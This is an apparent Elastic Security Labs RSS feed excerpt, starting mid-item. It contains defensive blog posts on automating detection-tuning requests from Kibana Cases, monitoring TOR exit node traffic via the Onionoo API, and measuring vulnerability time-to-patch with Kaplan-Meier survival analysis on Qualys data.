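            "assignees": [{"uid": "u:analyst1"}],
            "updated_by": {"username": "analyst1"},
            "tags": ["endpoint", "tuning"],
        }
    },
    "fields": {"TuningRequired": [True], "TuningDetail": ["Exclude IT admin hosts"]},
}

case_id = hit["_id"].split(":", 1)[1]  # strip the "cases:" prefix
case = hit["_source"]["cases"]
request = {
    "case_id": case_id,
    "title": case["title"],
    "requested_by": case["updated_by"]["username"],
    "tags": case["tags"],
    "detail": hit["fields"]["TuningDetail"][0],
}
print(request["case_id"])  # 4a8b2c1d-0f3e-4b5a-9c6d-7e8f9a0b1c2d
```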
<h3>Step 3: Retrieving the alerts attached to the case</h3>
<p>For each case you will want to know which alerts are attached to the case so you know which alerts need to be tuned. This can be done using the <a href="https://www.elastic.co/kr/docs/api/doc/kibana/operation/operation-getcasealertsdefaultspace">cases API</a> with the <code>_id</code> field for the case.</p>
<p><code>/api/cases/{caseId}/alerts</code></p>
<p>This query will return an array of all alert <code>id</code> values that are attached to the case. Using this ID value, you can query the <code>.siem-signals*</code> Elasticsearch index to find the full information about each alert attached to the case that needs tuning.</p>
<pre><code class="language-yaml">POST /.siem-signals-*/_search  
{  
 &quot;size&quot;: 1,  
 &quot;query&quot;: {  
   &quot;bool&quot;: {  
     &quot;must&quot;: [],  
     &quot;filter&quot;: [  
       {  
         &quot;bool&quot;: {  
           &quot;should&quot;: [  
             {  
               &quot;match&quot;: {  
                 &quot;_id&quot;: &quot;{{alert_id}}&quot;  
               }  
             }  
           ],  
           &quot;minimum_should_match&quot;: 1  
         }  
       },  
       {  
         &quot;range&quot;: {  
           &quot;@timestamp&quot;: {  
             &quot;format&quot;: &quot;strict_date_optional_time&quot;,  
             &quot;gte&quot;: &quot;now-30d&quot;,  
             &quot;lte&quot;: &quot;now&quot;  
           }  
         }  
       }  
     ],  
     &quot;should&quot;: [],  
     &quot;must_not&quot;: []  
   }  
 }  
}
</code></pre>
<p>From the results of this query you can extract information about the alert such as the name and creation date, along with any other information that could help for tuning such as the <code>user.name</code> or <code>process.name</code> fields. Because a case can have many alerts attached to it you will want to deduplicate the alerts by the <code>signal.rule.name</code> value.</p>
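<p>That deduplication is a straightforward group-by on the rule name. A minimal Python sketch over toy alert documents:</p>

```python
# Sketch: deduplicating attached alerts by signal.rule.name so each
# rule produces only one tuning request entry.
alerts = [
    {"signal": {"rule": {"name": "Rare DNS Query"}}, "user": {"name": "alice"}},
    {"signal": {"rule": {"name": "Rare DNS Query"}}, "user": {"name": "bob"}},
    {"signal": {"rule": {"name": "Unusual Parent Process"}}, "user": {"name": "alice"}},
]

by_rule = {}
for alert in alerts:
    rule_name = alert["signal"]["rule"]["name"]
    by_rule.setdefault(rule_name, []).append(alert)

print(sorted(by_rule))  # ['Rare DNS Query', 'Unusual Parent Process']
```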
<h3>Step 4: Opening a tuning request.</h3>
<p>This step depends on the ticketing system you use in your environment. Our team uses GitHub Issues to track tuning requests and Slack for notifications, but this could also be done with any ticketing or project management system that supports automation.</p>
<p>This is the logic flow we use for our automation using both GitHub and Slack to track tuning requests:</p>
<ul>
<li>Using the name of the alert we search for any existing open tuning requests.
<ul>
<li>If an existing tuning request exists we update that request with the details from the case and the new request</li>
<li>If no existing request exists we open a new tuning request issue and attach the information</li>
</ul>
</li>
<li>We then send a Slack notification to the detection engineering team’s Slack channel containing a link to the tuning request, a link to the case, and details about the request and alert.</li>
<li>We then use the <a href="https://www.elastic.co/kr/docs/api/doc/kibana/operation/operation-addcasecommentdefaultspace">Cases API</a> to add a comment to the original case with a link to the tuning request issue</li>
<li><strong>Optional AI Agent</strong>: We are starting to experiment with the use of AI Agents to analyze the alert and case information and then provide even better context with the tuning request, potentially even recommending the changes to make to the detection rules.</li>
</ul>
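<p>The find-or-update portion of that flow can be sketched as follows, with a plain dictionary standing in for the GitHub Issues API (the function and variable names here are hypothetical, not part of any real API):</p>

```python
# Sketch of the find-or-update tuning request logic. A dict stands in
# for the issue tracker; all names here are hypothetical.
open_issues = {}  # issue title -> list of request details

def file_tuning_request(rule_name, detail, case_link):
    title = f"Tuning: {rule_name}"
    entry = {"detail": detail, "case": case_link}
    if title in open_issues:
        open_issues[title].append(entry)  # update the existing request
        return "updated"
    open_issues[title] = [entry]          # open a new request
    return "created"

print(file_tuning_request("Rare DNS Query", "too noisy for IT hosts", "case:a1"))  # created
print(file_tuning_request("Rare DNS Query", "also fires on scanners", "case:b2"))  # updated
```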
<p>The final result of this automation is that our SOC analysts can create a detailed detection tuning request ticket with a single click from their case. Because of this automation, we have seen a dramatic reduction in false positives and a significant improvement in the overall efficiency of our detection rules.</p>
<h2>Conclusion</h2>
<p>By using Kibana Cases with custom fields and integrating with automation platforms, you can optimize many of your manual processes. This automated workflow reduces the manual overhead associated with collecting analyst feedback, ensuring that valuable analyst insights are quickly translated into actionable improvements in detection rules. The result is a more efficient, accurate, and resilient SOC that can adapt rapidly to emerging threats and reduce alert fatigue.</p>
<p>Ready to optimize your SOC's efficiency and improve your detection posture? Explore Elastic Security and start building your own automated tuning request workflows today!</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/automating-detection-tuning-requests-with-kibana-cases/Security Labs Images 10.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[TOR Exit Node Monitoring Overview]]></title>
            <link>https://www.elastic.co/kr/security-labs/tor-exit-node-monitoring</link>
            <guid>tor-exit-node-monitoring</guid>
            <pubDate>Mon, 27 Oct 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Learn how to monitor your enterprise for TOR exit node activity.]]></description>
            <content:encoded><![CDATA[<h2>Why Monitoring for TOR Exit Node Activity Matters</h2>
<p>In today’s complex cybersecurity landscape, one of the most overlooked but critical elements in proactive threat detection is monitoring for TOR (The Onion Router) exit node activity. TOR enables anonymous communication, and while it serves legitimate privacy interests, it also provides cover for cybercriminals, malware campaigns, and data exfiltration.</p>
<h2>What Are TOR Exit Nodes?</h2>
<p>TOR exit nodes are the final relay points in the TOR network where encrypted traffic exits to the open internet. If a user browses the web anonymously via TOR, the website or service they access will see the IP address of the exit node, not the user's actual IP address.</p>
<p>In other words, any network traffic originating from a TOR exit node is untraceable to its source without cooperation from the TOR network, which is unlikely by design.</p>
<h2>Why Should You Care?</h2>
<p>While not all TOR activity is malicious, a substantial amount of malicious traffic uses TOR to mask its origin. Here’s why it matters:</p>
<ol>
<li>
<p><strong>Anonymized Reconnaissance:</strong> Attackers often perform scans and probes from TOR exit nodes. If someone is mapping your infrastructure using TOR, they may be preparing for a breach attempt while remaining anonymous.</p>
</li>
<li>
<p><strong>Command and Control (C2) Channels:</strong> Many malware families use TOR for C2 communications, making it hard to trace the infected endpoint back to its controller.</p>
</li>
<li>
<p><strong>Data Exfiltration:</strong> TOR is a common channel for exfiltrating sensitive data out of an organization. If sensitive files are being uploaded to external endpoints via TOR, you may already be compromised.</p>
</li>
<li>
<p><strong>Compliance Risks:</strong> Some industries (e.g., healthcare, finance) require strict data handling and access controls. Allowing or ignoring TOR-originated traffic could violate these policies or industry regulations.</p>
</li>
</ol>
<p>You should look for any interactions between TOR exit nodes and:</p>
<ul>
<li>host.ip</li>
<li>server.ip</li>
<li>destination.ip</li>
<li>source.ip</li>
<li>client.ip</li>
</ul>
<p>This can occur in logs from firewalls, DNS, proxies, endpoint agents, cloud access logs, and more.</p>
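<p>Once the exit node list is ingested, the core check is simple set membership across those fields. A minimal Python sketch with illustrative (documentation-range) addresses:</p>

```python
# Sketch: checking the IP fields listed above against a set of known
# TOR exit addresses. Addresses here are illustrative only.
exit_addresses = {"203.0.113.7", "198.51.100.21"}  # e.g. from the Onionoo feed
ip_fields = ["host.ip", "server.ip", "destination.ip", "source.ip", "client.ip"]

event = {"source.ip": "203.0.113.7", "destination.ip": "10.0.0.5"}

hits = [field for field in ip_fields if event.get(field) in exit_addresses]
print(hits)  # ['source.ip']
```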
<h2>How to Monitor for TOR Exit Nodes</h2>
<p>To collect, monitor, alert, and report on TOR exit node activity, we must first create a few components: an index template and an ingest pipeline. We will then hit the TOR API endpoint every hour to request the most recent detailed information.</p>
<p>If you would like to learn more about options for monitoring TOR, you may read about them <a href="https://metrics.torproject.org/onionoo.html">here</a>. If you would like to know more about the TOR Project in general, you may read about it <a href="https://www.torproject.org/">here</a>.</p>
<h3>Ingest Pipeline</h3>
<p>First, let’s create an ingest pipeline that will handle the last bit of parsing our data before it is written to an index. In DevTools, simply apply the following request. Each processor includes a description, should you want to know more about what it does and its associated condition, if present.</p>
<p>Here is what your screen may look like:<br />
<img src="https://www.elastic.co/kr/security-labs/assets/images/tor-exit-node-monitoring/image4.png" alt="" /></p>
<p>You may find the ingest pipeline on <a href="https://ela.st/tor-node-ingest-pipeline">GitHub</a>.</p>
<h3>Index Template</h3>
<p>Next, we need to create our index template to ensure our fields are correctly mapped.</p>
<p>Still in DevTools, submit the following request just as you did with the ingest pipeline. You may find the index template via <a href="https://ela.st/tor-node-index-template">this link</a> on GitHub.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/tor-exit-node-monitoring/image9.png" alt="" /></p>
<p>Notice the priority of the index template; we set this to a much higher number so that this template will take precedence over the default logs-*-* template. While you will notice in the following steps that we set the ingest pipeline in our configuration for data collection, we may also apply it here as a safeguard to ensure data is written through this pipeline.</p>
<h3>Elastic-Agent Policy</h3>
<p>With these two items loaded, we may now navigate to Fleet and select the “agent policy” we want to install our integration to.</p>
<p>On the policy you wish to install the TOR collection to, simply click “Add integration”.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/tor-exit-node-monitoring/image13.png" alt="" /></p>
<p>Select “Custom” from the left-hand category list, then click “Custom API”.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/tor-exit-node-monitoring/image10.png" alt="" /></p>
<p>Click the blue “Add Custom API” button on your top right.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/tor-exit-node-monitoring/image12.png" alt="" /></p>
<p>You may title your Integration anything you like; however, I will be using “TOR Node Activity” in this example.</p>
<p>Fill in the following fields:</p>
<p>Dataset name:<br />
<code>ti_tor.node_activity</code></p>
<p>Ingest Pipeline:<br />
<code>logs-ti_tor.node_activity</code></p>
<p>Request URL:<br />
<code>https://onionoo.torproject.org/details?fields=exit_addresses,nickname,fingerprint,running,as_name,verified_host_names,unverified_host_names,or_addresses,last_seen,last_changed_address_or_port,first_seen,hibernating,last_restarted,bandwidth_rate,bandwidth_burst,observed_bandwidth,flags,version,version_status,advertised_bandwidth,platform,recommended_version,contact</code></p>
<p>Request Interval:<br />
<code>60m</code></p>
<p>Request HTTP Method:<br />
<code>GET</code></p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/tor-exit-node-monitoring/image2.png" alt="" /></p>
<p>Response Split:<br />
<code>target: body.relays</code></p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/tor-exit-node-monitoring/image6.png" alt="" /></p>
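<p>To make the response split concrete: Onionoo returns a single JSON object whose <code>relays</code> array holds one entry per relay, and the <code>target: body.relays</code> split emits one document per entry. A small Python approximation (the response shape is abbreviated and illustrative):</p>

```python
# Sketch: what the "target: body.relays" response split does,
# approximately - one ingested document per relay in the response.
response = {
    "version": "10.0",
    "relays": [
        {"nickname": "relayA", "exit_addresses": ["203.0.113.7"], "running": True},
        {"nickname": "relayB", "exit_addresses": ["198.51.100.21"], "running": False},
    ],
}

documents = [relay for relay in response["relays"]]
print(len(documents))            # 2
print(documents[0]["nickname"])  # relayA
```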
<p>You will then need to click to expand the “&gt; Advanced options” and scroll down a bit more.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/tor-exit-node-monitoring/image3.png" alt="" /></p>
<p>You may find the necessary processor snippet to copy at GitHub <a href="https://ela.st/tor-node-elastic-agent-processors">here</a>.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/tor-exit-node-monitoring/image1.png" alt="" /></p>
<p>You may now click the “Save and continue” button and in a few minutes you will have TOR node activity available in your logs-* index!</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/tor-exit-node-monitoring/image5.png" alt="" /></p>
<h3>Filebeat Installation Option</h3>
<p>If you are not using Elastic-Agent and wish to ingest via Filebeat, that’s cool too! Instead of following the steps above, simply leverage the following <code>filebeat.inputs:</code> configuration, which uses the exact same ingest pipeline and index template as above. Copy and paste the <a href="https://ela.st/tor-node-filebeat-input">input section</a> into your filebeat.yml file; you will still need to add an output section.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/tor-exit-node-monitoring/image11.png" alt="" /></p>
<h2>Reviewing your data</h2>
<p>Now that you've completed the configuration of the ingest pipeline and the agent integration, you can see the TOR nodes in the Discover view. From here, you can create rules, visualizations, dashboards, etc., to help keep tabs on how TOR is being used on your network.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/tor-exit-node-monitoring/image14.png" alt="" /></p>
<h2>What can you do next?</h2>
<p>The beautiful thing about the naming convention for this index is that it automatically works with the Threat Intel IP Address Indicator Match rule available in the Elastic SIEM.</p>
<p>However, you may want to create your own rule using some of the wealth of information provided by this integration, particularly depending on the type of node observed in your environment. Since this index is enriched with a considerable amount of geo-based data, now would be an excellent time to check out some of the map features within Kibana.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/tor-exit-node-monitoring/image8.png" alt="" /></p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/tor-exit-node-monitoring/Security Labs Images 9.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Time-to-Patch Metrics: A Survival Analysis Approach Using Qualys and Elastic]]></title>
            <link>https://www.elastic.co/kr/security-labs/time-to-patch-metrics</link>
            <guid>time-to-patch-metrics</guid>
            <pubDate>Wed, 22 Oct 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[In this article, we describe how we applied survival analysis to vulnerability management (VM) data from Qualys VMDR, using the Elastic Stack.]]></description>
            <content:encoded><![CDATA[<h1>Time-to-Patch Metrics: A Survival Analysis Approach Using Qualys and Elastic</h1>
<h2>Introduction</h2>
<p>Understanding how quickly vulnerabilities are remediated across different environments and teams is critical to maintaining a strong security posture. In this article, we describe how we applied <strong>survival analysis</strong> to vulnerability management (VM) data from <strong>Qualys VMDR</strong>, using the <strong>Elastic Stack</strong>. This allowed us to not only confirm general assumptions about team velocity (how quickly teams complete work) and remediation capacity (how much fixing they can take on) but also derive measurable insights. Since most of our security data is in the Elastic Stack, this process should be easily reproducible with other security data sources.</p>
<h3>Why We Did It</h3>
<p>Our primary motivation was to <strong>move from general assumptions to data-backed insights</strong> about:</p>
<ul>
<li>How quickly different teams and environments patch vulnerabilities</li>
<li>Whether patching performance meets internal service level objectives (SLOs)</li>
<li>Where bottlenecks or delays commonly occur</li>
<li>What other factors can affect patching performance</li>
</ul>
<h3>Why Survival Analysis? A Better Alternative to Mean Time to Remediate</h3>
<p>Mean Time to Remediate (MTTR) is commonly used to track how quickly vulnerabilities are patched, but both the mean and median suffer from significant limitations (we provide an example later in this article). The mean is highly sensitive to <em>outliers</em> [1] and assumes the remediation times are evenly balanced around the average remediation time, which is rarely the case in practice. The median is less sensitive to extremes but discards information about the shape of the distribution and says nothing about the long tail of slow-to-patch vulnerabilities. Neither accounts for unresolved cases, i.e. vulnerabilities that remain open beyond the observation window, which are often excluded entirely. In practice, the vulnerabilities that remain open the longest are precisely the ones we should be most concerned about.</p>
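<p>To make the outlier sensitivity concrete, here is a tiny illustration; the remediation times below are invented for demonstration:</p>

```python
from statistics import mean, median

# Hypothetical remediation times (days): most are patched quickly,
# but one hard-to-update system takes 600 days.
days_to_patch = [5, 7, 8, 10, 12, 14, 15, 20, 25, 600]

print(mean(days_to_patch))    # 71.6 -- dragged far above the typical case
print(median(days_to_patch))  # 13.0 -- blind to the shape of the tail
```

<p>A single 600-day outlier pulls the mean to roughly five times the typical value, while the median stays put but says nothing about that tail.</p>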
<p><strong>Survival analysis</strong> addresses these limitations. Originating in medical and actuarial contexts, it models <strong>time-to-event data</strong> while explicitly incorporating <strong>censored observations</strong>, meaning in our context vulnerabilities that remain open. (For more details on its application to vulnerability management we strongly recommend <a href="https://www.themetricsmanifesto.com">“The Metrics Manifesto”</a>). Instead of collapsing remediation behavior into a single number, survival analysis estimates the probability that a vulnerability remains unpatched over time (e.g. 90% of vulnerabilities are remediated within 30 days). This allows for more meaningful assessments, such as the proportion of vulnerabilities patched within SLO (for example within 30, 90, or 180 days).</p>
<p>Survival analysis provides us with a <strong>survival function</strong> that estimates the probability a vulnerability remains unpatched over time.</p>
<p>This method offers a better view of remediation performance, allowing us to assess not just how long vulnerabilities persist, but also how remediation behavior differs across systems, teams, or severity levels. It’s particularly well-suited to security data, which is often incomplete, skewed, and resistant to assumptions of normality.</p>
<h2>Context</h2>
<p>Although we have applied survival analysis across different environments, teams and organizations, in this blog we focus on the results for the Elastic Cloud production environment.</p>
<h3>Vulnerability age calculation</h3>
<p>There are different methods to calculate vulnerability age.</p>
<p>For our internal metrics like <a href="https://www.elastic.co/kr/blog/how-infosec-uses-elastic-stack-vulnerability-management">vulnerability adherence SLO</a>, we define vulnerability age as the difference between when a vulnerability was last found and when it was first detected anywhere in our environment (usually a few days after publication). This approach deliberately penalizes vulnerabilities that are reintroduced from an outdated base image. In the past, our base images were not updated as frequently as we would have liked, so on a newly created instance, vulnerabilities can have a significant age (e.g., 100 days) from day one of discovery.</p>
<p>For this analysis, we find it more relevant to calculate the age as the number of days between the last found date and the first found date on a given asset. In this case, age represents the number of days the system was effectively exposed.</p>
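<p>As a quick sketch of this age calculation (the dates below are hypothetical):</p>

```python
from datetime import datetime

# Hypothetical first/last found dates for one vulnerability on one asset.
first_found = datetime.fromisoformat("2025-03-01T08:00:00")
last_found = datetime.fromisoformat("2025-04-12T08:00:00")

# Age = number of days the system was effectively exposed.
vulnerability_age = (last_found - first_found).days
print(vulnerability_age)  # 42
```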
<h3>“Patch everything” strategy</h3>
<p>In our Cloud environment, we maintain a policy to patch everything. This is because we almost exclusively use the same base image across all instances. Since Elastic Cloud operates fully on containers, there are no specific application packages (e.g., Elasticsearch) installed directly on our systems. Our fleet remains homogeneous as a result.</p>
<h2>Data Pipeline</h2>
<p>Ingesting and mapping data into the Elastic Stack can be cumbersome. Luckily, we have <a href="https://www.elastic.co/kr/integrations/data-integrations?solution=all-solutions&amp;category=security">many security integrations</a> that handle those natively, <a href="https://www.elastic.co/kr/docs/reference/integrations/qualys_vmdr">Qualys VMDR</a> being one of them.</p>
<p>This integration has three main advantages over custom ingestion methods (e.g. scripts, Beats, etc.):</p>
<ul>
<li>It natively enriches vulnerability data from the Qualys Knowledge Base, which adds CVE IDs, threat intel information, and more, <strong>without needing to configure enrich pipelines</strong>.</li>
<li>Qualys data is already mapped to the Elastic Common Schema, a standardized way of representing data regardless of where it comes from: for example, CVEs are always stored in the field <em>vulnerability.id</em>, independent of the source.</li>
<li>A transform that maintains the latest state of each vulnerability is already set up; this index can be queried to get the latest vulnerability status.</li>
</ul>
<h3>Qualys agent integration configuration</h3>
<p>For survival analysis, we need to ingest both active and patched vulnerabilities. To analyze a specific period, we set the number of days in the field <code>max_days_since_detection_updated</code>. In our environment, we ingest Qualys data daily, so there’s no need to re-ingest a long history of fixed findings; that backfill has already been done.</p>
<p>The Qualys VMDR elastic agent integration has been configured with the following:</p>
<table>
<thead>
<tr>
<th align="left">Property</th>
<th align="left">Value</th>
<th align="left">Comment</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">(Settings section) Username</td>
<td align="left"></td>
<td align="left"></td>
</tr>
<tr>
<td align="left">(Settings section) Password</td>
<td align="left"></td>
<td align="left">Since there are no API keys available in Qualys, we can only authenticate with Basic Authentication. Make sure SSO is disabled for this account.</td>
</tr>
<tr>
<td align="left">URL</td>
<td align="left"><a href="https://qualysapi.qg2.apps.qualys.com">https://qualysapi.qg2.apps.qualys.com</a> (for US2)</td>
<td align="left"><a href="https://www.qualys.com/platform-identification/">https://www.qualys.com/platform-identification/</a></td>
</tr>
<tr>
<td align="left">Interval</td>
<td align="left">4h</td>
<td align="left">Adjust it based on the number of ingested events.</td>
</tr>
<tr>
<td align="left">Input parameters</td>
<td align="left">show_asset_id=1&amp; include_vuln_type=confirmed&amp;show_results=1&amp;max_days_since_detection_updated=3&amp;status=New,Active,Re-Opened,Fixed&amp;filter_superseded_qids=1&amp;use_tags=1&amp;tag_set_by=name&amp;tag_include_selector=all&amp;tag_exclude_selector=any&amp;tag_set_include=status:running&amp;tag_set_exclude=status:terminated,status:stopped,status:stale&amp;show_tags=1&amp;show_cloud_tags=1</td>
<td align="left">show_asset_id=1: retrieve the asset ID<br />show_results=1: include details about the currently installed package and which version should be installed<br />max_days_since_detection_updated=3: filter out vulnerabilities that haven’t been updated in the last 3 days (e.g. patched more than 3 days ago)<br />status=New,Active,Re-Opened,Fixed: all vulnerability statuses are ingested<br />filter_superseded_qids=1: ignore superseded vulnerabilities<br />tag_* parameters: filter by tags<br />show_tags=1: retrieve Qualys tags<br />show_cloud_tags=1: retrieve Cloud tags</td>
</tr>
</tbody>
</table>
<p>Once data is fully ingested, it can be reviewed either in Kibana Discover (logs-* data view -&gt; <em>data_stream.dataset : &quot;qualys_vmdr.asset_host_detection&quot;</em>) or in the Kibana Security App (Findings -&gt; Vulnerabilities).</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/time-to-patch-metrics/image6.png" alt="" /></p>
<h3>Loading data into Python with the elasticsearch client</h3>
<p>Since the survival analysis calculation will be done in Python, we need to extract data from Elasticsearch into a pandas DataFrame. There are several ways to achieve this; in this article we’ll focus on two of them.</p>
<h4>With ES|QL</h4>
<p>The easiest and most convenient way is to leverage ES|QL with the arrow format. It’ll automatically populate the python dataframe (rows and columns). We recommend reading the blog post <a href="https://www.elastic.co/kr/search-labs/blog/esql-pandas-native-dataframes-python">From ES|QL to native Pandas dataframes in Python</a> to get more details.</p>
<pre><code class="language-py">from elasticsearch import Elasticsearch
import pandas as pd

client = Elasticsearch(
    &quot;https://[host].elastic-cloud.com&quot;,
    api_key=&quot;...&quot;,
)

response = client.esql.query(
    query=&quot;&quot;&quot;
   FROM logs-qualys_vmdr.asset_host_detection-default
    | WHERE elastic.owner.team == &quot;platform-security&quot; AND elastic.environment == &quot;production&quot;
    | WHERE qualys_vmdr.asset_host_detection.vulnerability.is_ignored == FALSE
    | EVAL vulnerability_age = DATE_DIFF(&quot;day&quot;, qualys_vmdr.asset_host_detection.vulnerability.first_found_datetime, qualys_vmdr.asset_host_detection.vulnerability.last_found_datetime)
    | STATS 
        mean=AVG(vulnerability_age), 
        median=MEDIAN(vulnerability_age)
    &quot;&quot;&quot;,
    format=&quot;arrow&quot;,
)
df = response.to_pandas(types_mapper=pd.ArrowDtype)
print(df)
</code></pre>
<p>Today, we have a limitation with ES|QL: we can’t paginate through results, so we are limited to 10K output documents (100K if the server configuration is modified). Progress can be followed through this <a href="https://github.com/elastic/elasticsearch/issues/100000">enhancement request</a>.</p>
<h4>With DSL</h4>
<p>The elasticsearch Python client has a native feature to extract all the data from a query with transparent pagination. The challenging part is creating the DSL query; we recommend building the query in Discover, then clicking Inspect and opening the Request tab to copy the DSL query.</p>
<pre><code class="language-py">from elasticsearch.helpers import scan  # handles scroll pagination transparently

query = {
    &quot;track_total_hits&quot;: True,
    &quot;query&quot;: {
        &quot;bool&quot;: {
            &quot;filter&quot;: [
                {
                    &quot;match&quot;: {
                        &quot;elastic.owner.team&quot;: &quot;awesome-sre-team&quot;
                    }
                },
                {
                    &quot;match&quot;: {
                        &quot;elastic.environment&quot;: &quot;production&quot;
                    }
                },
                {
                    &quot;match&quot;: {
                        &quot;qualys_vmdr.asset_host_detection.vulnerability.is_ignored&quot;: False
                    }
                }
            ]
        }
    },
    &quot;fields&quot;: [
        &quot;@timestamp&quot;,
        &quot;qualys_vmdr.asset_host_detection.vulnerability.unique_vuln_id&quot;,
        &quot;qualys_vmdr.asset_host_detection.vulnerability.first_found_datetime&quot;,
        &quot;qualys_vmdr.asset_host_detection.vulnerability.last_found_datetime&quot;,
        &quot;elastic.vulnerability.age&quot;,
        &quot;qualys_vmdr.asset_host_detection.vulnerability.status&quot;,
        &quot;vulnerability.severity&quot;,
        &quot;qualys_vmdr.asset_host_detection.vulnerability.is_ignored&quot;
    ],
    &quot;_source&quot;: False
}

# 'es' is the Elasticsearch client created earlier; 'source_index' is the
# data stream to query (e.g. logs-qualys_vmdr.asset_host_detection-default).
results = list(scan(
        client=es,
        query=query,
        scroll='30m',
        index=source_index,
        size=10000,
        raise_on_error=True,
        preserve_order=False,
        clear_scroll=True
    ))
</code></pre>
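<p>As a hedged sketch, the hits returned by <code>scan</code> can then be flattened into (duration, event) observations for survival analysis. The field names match the DSL query above; the helper and sample hit below are illustrative, and the single-item lists reflect how Elasticsearch returns <code>fields</code>:</p>

```python
from datetime import datetime

PREFIX = "qualys_vmdr.asset_host_detection.vulnerability."

def _parse(ts):
    # Elasticsearch emits ISO 8601 timestamps with a trailing 'Z'.
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))

def to_observation(hit):
    """Turn one scan() hit into (duration_days, event_observed).

    event_observed is True when the vulnerability was fixed (uncensored)
    and False when it is still open (censored). Field names are the ones
    requested in the DSL query above; each field arrives as a list.
    """
    fields = hit["fields"]
    first = _parse(fields[PREFIX + "first_found_datetime"][0])
    last = _parse(fields[PREFIX + "last_found_datetime"][0])
    return (last - first).days, fields[PREFIX + "status"][0] == "Fixed"

# Hypothetical hit shaped like an Elasticsearch 'fields' response:
hit = {"fields": {
    PREFIX + "first_found_datetime": ["2025-01-01T00:00:00Z"],
    PREFIX + "last_found_datetime": ["2025-02-15T00:00:00Z"],
    PREFIX + "status": ["Fixed"],
}}
print(to_observation(hit))  # (45, True)
```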
<h2>Survival Analysis</h2>
<p>You can refer to the <a href="https://github.com/lauravoicu/elastic-vm-survivalanalysis/tree/main">code</a> to understand the approach or to reproduce it on your own dataset.</p>
<h2>What We Learned</h2>
<p>Leaning on the research from the <a href="https://www.cyentia.com/why-your-mttr-is-probably-bogus/">Cyentia Institute</a>, we looked at a few different ways to measure how long it takes to remediate vulnerabilities: means, medians, and survival curves. Each method gives a different lens through which we can understand time-to-patch data, and the comparison matters because, depending on which method we use, we would draw very different conclusions about how well vulnerabilities are being addressed.</p>
<p>The first method focuses only on vulnerabilities that have already been closed. It calculates the median and mean time it took to patch them. This is intuitive and simple, but it leaves out a potentially large and important portion of the data (the vulnerabilities that are still open). As a result, it tends to underestimate the true time it takes to remediate, especially if some vulnerabilities stay open much longer than others.</p>
<p>The second method tries to include both closed and open vulnerabilities by using the time they’ve been open <em>so far</em>. There are many options for approximating a time-to-patch for the open vulnerabilities, but for simplicity here we assumed they were patched at the time of reporting, which we know isn’t true. It does, however, offer a way to factor in their existence.</p>
<p>The third method uses survival analysis. Specifically, we used the Kaplan-Meier estimator to model the likelihood that a vulnerability is still open at any given time. This method handles the open vulnerabilities properly: instead of pretending they’re patched, it treats them as “censored” data. The survival curve it produces drops over time, showing the proportion of vulnerabilities still open as days or weeks pass.</p>
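<p>For intuition, here is a minimal pure-Python sketch of the Kaplan-Meier product-limit estimator; the linked analysis code is the authoritative implementation, and the toy cohort below is invented:</p>

```python
def kaplan_meier(durations, events):
    """Kaplan-Meier product-limit estimate of the survival function S(t).

    durations: days each vulnerability was observed open.
    events: True if patched at that time (event), False if still open (censored).
    Returns a list of (t, S(t)) pairs at each distinct event time.
    """
    obs = sorted(zip(durations, events))
    n_at_risk = len(obs)
    s = 1.0
    curve = []
    i = 0
    while i < len(obs):
        t = obs[i][0]
        patched_at_t = 0  # events occurring exactly at time t
        leaving = 0       # events + censored observations leaving the risk set at t
        while i < len(obs) and obs[i][0] == t:
            leaving += 1
            if obs[i][1]:
                patched_at_t += 1
            i += 1
        if patched_at_t:
            s *= 1 - patched_at_t / n_at_risk  # product-limit step
            curve.append((t, s))
        n_at_risk -= leaving
    return curve

# Toy cohort: four vulnerabilities patched at 10/20/30/50 days, two still open.
durations = [10, 20, 30, 50, 40, 60]
events = [True, True, True, True, False, False]
for t, s in kaplan_meier(durations, events):
    print(f"S({t}) = {s:.2f}")
```

<p>For this cohort the estimate drops to S(30) ≈ 0.50 and S(50) ≈ 0.25: the censored observations shrink the risk set without forcing the curve down, which is exactly how open vulnerabilities are handled “properly”.</p>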
<h3>How Long Do Vulnerabilities Last?</h3>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/time-to-patch-metrics/image4.png" alt="" /></p>
<p>In the current 6-month snapshot [2], the closed-only time-to-patch has a median of ~33 days and a mean of ~35 days. On the surface that looks reasonable, but the Kaplan-Meier curve shows what those numbers hide: at 33 days, ~54% are still open; at 35 days, ~46% are still open. So even around the “typical” one-month mark, about half of issues remain unresolved.</p>
<p>We also computed observed-so-far statistics (treating open vulnerabilities as if they were patched at the end of the measurement window). In this window they happen to be almost the same (median ~33 days, mean ~35 days) because the ages of today’s open items cluster near one month. That coincidence can make averages look reassuring, but it’s incidental and unstable: if we shift the snapshot to just before the monthly patch push, these same statistics drop sharply (we’ve seen an observed median of ~19 days and an observed mean of ~15 days) without any change in the underlying process.</p>
<p>The survival curve avoids that trap, because it answers the question of “% still open after 30/60/90 days”, and offers visibility into the long tail that stays open well past a month.</p>
<h3>Patch Everything Everywhere The Same Way?</h3>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/time-to-patch-metrics/image5.png" alt="" /></p>
